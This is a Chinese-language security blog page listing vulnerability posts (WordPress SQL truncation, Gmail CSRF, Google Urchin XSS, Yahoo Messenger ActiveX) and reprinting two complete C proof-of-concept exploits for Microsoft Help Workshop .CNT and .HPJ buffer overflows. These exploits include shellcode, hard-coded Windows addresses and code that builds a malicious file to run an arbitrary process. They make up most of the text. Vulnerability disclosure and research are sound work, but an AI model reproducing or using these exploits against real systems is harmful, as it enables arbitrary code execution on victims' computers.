大砲開講

WordPress 2.6.1存在SQL Truncation安全漏洞

更新：WordPress 2.6.2已經修復此漏洞，請到這裡下載。

WordPress 2.6.1被發現存在SQL Truncation安全漏洞。如果WordPress開放註冊功能，攻擊者可以經由遠端取得管理者密碼。 閱讀全文 »

PoC, 安全漏洞 | 瀏覽數：12,887 | 2 迴響 »

Google Gmail 被發現 CSRF 安全漏洞

GnuCitizen 的 pdp 宣稱發現 Google Gmail 存在一個 CSRF 安全漏洞，使得攻擊者可以製作任意的惡意網頁，當使用者瀏覽那些網頁時，可以將某些規則寫入 Gmail 的篩選器中 (當然，那時你已經登入 Gmail)，以綁架 (監控) 使用者的電子郵件。

PoC, 安全漏洞, 網站安全 | 瀏覽數：674 | 5 迴響 »

Google Urchin 被發現 XSS 安全漏洞

GnuCitizen 的 Adrian Pastor 發現 Google Urchin 存在一個 XSS 安全漏洞，使得攻擊者根本不需要登入帳號和密碼，即可登入Urchin 的管理網頁。此一安全漏洞可以被利用於釣魚網站攻擊上。

其他的驗證程式碼和展示影片，請參考下列的網址：http://www.gnucitizen.org/blog/google-urchin-password-theft-madnesshttp://www.youtube.com/v/wCUovL9WLVQ

另外，RSnake 在他的部落格中，也利用一個網站展示此漏洞 (如下圖)：

PoC, 安全漏洞, 網站安全 | 瀏覽數：609 | 0 迴響 »

Yahoo! 即時通 8.1.0.421 出現安全漏洞

Yahoo! 即時通(版本為8.1.0.421)最近又被發現CYFT ActiveX控制元件(ft60.dll)存在一個安全漏洞，允許遠端攻擊者開啟用戶端系統上的任意文件或程式。

PoC, 安全漏洞 | 瀏覽數：439 | 0 迴響 »

微軟 .CNT 檔案有緩衝區溢位漏洞

微軟 Help Workshop 在處理 Help Contents Files (.CNT) 時，發生堆疊式記憶體損毀漏洞，使得駭客有可能利用此漏洞執行任何程式碼，驗證程式 (PoC) 已經可以在某些網站上找到。

受影響軟體：

Microsoft Help Workshop v4.03.0002
Microsoft Visual Studio 6.0 SP6
Microsoft Visual Studio 2003 (.Net)

發現者/研究者：

porkythepig (porkythepig@anspi.pl)

有興趣的人，可以在 milw0rm 網站下載驗證程式或參考下面：

/////////////////////////////////////////////////////////////
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************

#include “stdio.h”
#include “stdlib.h”
#include “string.h”
#include “memory.h”

#define STR01 “0 Microsoft Help Workshop PoC exploit by porkythepig “
#define DEF_SPAWNED_PROCESS “notepad.exe”
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0×210
#define PROC_NAME_OFFSET 0×228
#define BACK_SEQ_OFFSET 0×218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0×4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0×65

typedef struct
{
unsigned int extPro;
unsigned int getStarInf;
unsigned int crePro;
unsigned int getWinDir;
unsigned int jmpEspPtr;
}ApiPtrs;

ApiPtrs osApiPtrs[5]=
{
0×793f69da,0×793f6b7a,0×793f5010,0×793f2d23,0×7cfdbd1b,
0×7c4ee01a,0×7c4f49df,0×7c4fc0a0,0×7c4e9cFF,0×784452e4,
0×7c5969da,0×7c596b7a,0×7c595010,0×7c592d23,0×7d0812e4,
0×7c81cdda,0×7c801eee,0×7c802367,0×7c821363,0×7cc58fd8,
0×77e75cb5,0×77e6177a,0×77e61bb8,0×77e705b0,0×775e6247
};

unsigned char shlCode[]=
{
0×66,0×83,0xc4,0×10,0×8b,0xc4,0×66,0×81,
0xec,0×10,0×21,0×50,0×66,0×2d,0×11,0×11,
0×50,0xb8,0×7a,0×6b,0×3f,0×79,0xff,0xd0,
0×58,0×50,0×80,0×38,0×20,0×74,0×49,0×5b,
0×53,0×33,0xc0,0xb0,0xff,0×50,0×66,0×81,
0xeb,0×11,0×05,0×53,0xb8,0×23,0×2d,0×3f,
0×79,0×3c,0xff,0×75,0×02,0×32,0xc0,0xff,
0xd0,0×58,0×50,0×66,0×2d,0×11,0×05,0×32,
0xdb,0×38,0×18,0×74,0×03,0×40,0xeb,0xf9,
0×5b,0×53,0×32,0xd2,0xb1,0×5c,0×88,0×08,
0×40,0×38,0×13,0×74,0×08,0×8a,0×0b,0×88,
0×08,0×43,0×40,0xeb,0xf4,0×32,0xd2,0×88,
0×10,0×58,0×50,0×66,0×2d,0×11,0×05,0×48,
0×40,0×8b,0xd0,0×58,0×50,0×66,0×2d,0×11,
0×11,0×50,0×33,0xc9,0×51,0×51,0×51,0×51,
0×51,0×51,0×51,0×52,0xb8,0×10,0×50,0×3f,
0×79,0xff,0xd0,0×33,0xc0,0×50,0xb8,0xda,
0×69,0×3f,0×79,0xff,0xd0
};

unsigned char backSeq[]=
{
0xe9,0×1b,0xfe,0xff,0xff
};

char buf0[EXPL_SIZE];
char spawnProcess[PROC_NAM_SIZ];
char *outName;
int osId;
int defProc;

void CompileBuffer()
{
int ptr=0;

memset(buf0,’1′,EXPL_SIZE);
ptr+=sprintf(buf0,”%s”,STR01);
memcpy(buf0+ptr,shlCode,sizeof(shlCode));
memcpy(buf0+BACK_SEQ_OFFSET,backSeq,sizeof(backSeq));

*((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;
*((unsigned int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
*((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
*((unsigned int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
*((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;

ptr=PROC_NAME_OFFSET;
if(!defProc)
{
buf0[ptr]=32;
ptr++;
}
sprintf(buf0+ptr,”%s”,spawnProcess);

printf(”Exploit buffer compiled\n”);
}

void WriteBuffer()
{
FILE *o;

o=fopen(outName,”wb”);
if(o==NULL)
{
printf(”Cannot open file for writing\n”);
exit(0);
}

fwrite(buf0,EXPL_SIZE,1,o);
fclose(o);

printf(”Output .cnt file [ %s ] built successfully\n”,outName);
}

void ProcessInput(int argc, char* argv[])
{
printf(”\nMicrosoft Help Workshop 4.03.0002 .cnt files exploit\n”);
printf(”Vulnerability found & exploit built by porkythepig\n”);

if(argc<3)
{
printf(”Syntax: exploit.exe os outName [spawnProc]\n”);
printf(”[ os ] host OS, possible choices:\n”);
printf(” 0 Windows 2000 SP4 [Polish] updates on 11.01.2007\n”);
printf(” 1 Windows 2000 SP4 [English]\n”);
printf(” 2 Windows 2000 SP4 [English] updates on 11.01.2007\n”);
printf(” 3 Windows XP Pro SP2 [English] updates on 11.01.2007\n”);
printf(” 4 Windows XP Pro [English]\n”);
printf(”[ outName ] output .cnt exploit file name\n”);
printf(”[ spawnProc ] *optional* full path to the process to be spawned by\n”);
printf(” the exploit (if none specified default will be notepad.exe)\n”);
exit(0);
}

osId=atol(argv[1]);
if((osId<0)||(osId>4))
{
exit(0);
}

outName=argv[2];

if(argc>3)
{
if(strlen(argv[3])>=PROC_NAM_SIZ)
{
exit(0);
}
strcpy(spawnProcess,argv[3]);
defProc=0;
}
else
{
strcpy(spawnProcess,DEF_SPAWNED_PROCESS);
defProc=1;
}
}

int main(int argc, char* argv[])
{

ProcessInput(argc,argv);
CompileBuffer();
WriteBuffer();

return 0;
}

PoC, 安全漏洞, 網站安全 | 瀏覽數：251 | 0 迴響 »

微軟 .HPJ 檔案有緩衝區溢位漏洞

微軟 Help Workshop 在處理 Help Project Files (.HPJ) 時，由於沒有檢查邊界輸入值，導致發生堆疊式記憶體損毀漏洞，使得駭客有可能利用此漏洞執行任何程式碼，驗證程式 (PoC) 已經可以在某些網站上找到。

受影響的軟體：

Microsoft Help Workshop v4.03.0002
Microsoft Visual Studio 6.0 SP6
Microsoft Visual Studio 2003 (.Net)

發現者/研究者：

porkythepig (porkythepig@anspi.pl)

有興趣的人，可以在作者網站下載驗證程式或參考下面：

//////////////////////////////////////////////
//*****************
//
// PoC exploit for (.HPJ) project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include “stdio.h”
#include “stdlib.h”
#include “string.h”
#include “memory.h”
#define STR01 “Microsoft Help Workshop PoC exploit by porkythepig”
#define DEF_SPAWNED_PROCESS “notepad.exe”
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0×14e
#define PROC_NAME_OFFSET 0×166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0×58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0×73
typedef struct
{
unsigned int extPro;
unsigned int getStarInf;
unsigned int crePro;
unsigned int getWinDir;
unsigned int jmpEspPtr;
}ApiPtrs;
ApiPtrs osApiPtrs[5]=
{
0×793f69da,0×793f6b7a,0×793f5010,0×793f2d23,0×793d1c8b,
0×7c4ee01a,0×7c4f49df,0×7c4fc0a0,0×7c4e9cFF,0×7ffd2d63,
0×7c5969da,0×7c596b7a,0×7c595010,0×7c592d23,0×7d0c65f1,
0×7c81cdda,0×7c801eee,0×7c802367,0×7c821363,0×7cb97b75,
0×77e75cb5,0×77e6177a,0×77e61bb8,0×77e705b0,0×775fe310
};
unsigned char shlCode[]=
{
0×66,0×83,0xc4,0×10,0×8b,0xc4,0×66,0×81,
0xec,0×10,0×21,0×50,0×66,0×2d,0×11,0×11,
0×50,0xb8,0×7a,0×6b,0×3f,0×79,0xff,0xd0,
0×58,0×50,0×80,0×38,0×20,0×74,0×49,0×5b,
0×53,0×33,0xc0,0xb0,0xff,0×50,0×66,0×81,
0xeb,0×11,0×05,0×53,0xb8,0×23,0×2d,0×3f,
0×79,0×3c,0xff,0×75,0×02,0×32,0xc0,0xff,
0xd0,0×58,0×50,0×66,0×2d,0×11,0×05,0×32,
0xdb,0×38,0×18,0×74,0×03,0×40,0xeb,0xf9,
0×5b,0×53,0xb2,0×01,0xb1,0×5c,0×88,0×08,
0×40,0×38,0×13,0×74,0×08,0×8a,0×0b,0×88,
0×08,0×43,0×40,0xeb,0xf4,0xb2,0×01,0×88,
0×10,0×58,0×50,0×66,0×2d,0×11,0×05,0×48,
0×40,0×8b,0xd0,0×80,0×38,0×01,0×74,0×03,
0×40,0xeb,0xf8,0×32,0xc9,0×88,0×08,0×58,
0×50,0×66,0×2d,0×11,0×11,0×50,0×33,0xc9,
0×51,0×51,0×51,0×51,0×51,0×51,0×51,0×52,
0xb8,0×10,0×50,0×3f,0×79,0xff,0xd0,0×33,
0xc0,0×50,0xb8,0xda,0×69,0×3f,0×79,0xff,
0xd0
};
char buf0[EXPL_SIZE];
char spawnProcess[PROC_NAM_SIZ];
char *outName;
int osId;
int defProc;
void CompileBuffer()
{
int ptr=0;
memset(buf0,’1′,EXPL_SIZE);
ptr+=sprintf(buf0,”;%s\r\n\r\n[OPTIONS]\r\nHLP=”,STR01);
memcpy(buf0+ptr,shlCode,sizeof(shlCode));
*((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;
*((unsigned int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
*((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
*((unsigned int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
*((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;
ptr=PROC_NAME_OFFSET;
if(!defProc)
{
buf0[ptr]=32;
ptr++;
}
sprintf(buf0+ptr,”%s\x01″,spawnProcess);
buf0[EXPL_SIZE-2]=’\\’;
printf(”Exploit buffer compiled\n”);
}
void WriteBuffer()
{
FILE *o;
o=fopen(outName,”wb”);
if(o==NULL)
{
printf(”Cannot open file for writing\n”);
exit(0);
}
fwrite(buf0,EXPL_SIZE,1,o);
fclose(o);
printf(”Output .hpj file [ %s ] built successfully\n”,outName);
}
void ProcessInput(int argc, char* argv[])
{
printf(”\nMicrosoft Help Workshop 4.03.0002 .HPJ Project file exploit\n”);
printf(”Vulnerability found & exploit built by porkythepig\n”);

if(argc<3)
{
printf(”Syntax: exploit.exe os outName [spawnProc]\n”);
printf(”[os] host OS, possible choices:\n”);
printf(” 0 Windows 2000 SP4 [Polish] updates-04012007\n”);
printf(” 1 Windows 2000 SP4 [English]\n”);
printf(” 2 Windows 2000 SP4 [English] updates-04012007\n”);
printf(” 3 Windows XP Pro SP2 [English] updates-04012007\n”);
printf(” 4 Windows XP Pro [English]\n”);
printf(”[outName] output .hpj exploit file name\n”);
printf(”[spawnProc] *optional* full path to the process to be spawned by\n”);
printf(” the exploit (if none specified default will be notepad.exe)\n”);
exit(0);
}
osId=atol(argv[1]);
if((osId<0)||(osId>4))
{
exit(0);
}
outName=argv[2];
if(argc>3)
{
if(strlen(argv[3])>=PROC_NAM_SIZ)
{
exit(0);
}
strcpy(spawnProcess,argv[3]);
defProc=0;
}
else
{
strcpy(spawnProcess,DEF_SPAWNED_PROCESS);
defProc=1;
}
}
int main(int argc, char* argv[])
{
ProcessInput(argc,argv);
CompileBuffer();
WriteBuffer();
return 0;
}

PoC, 安全漏洞, 網站安全 | 瀏覽數：241 | 0 迴響 »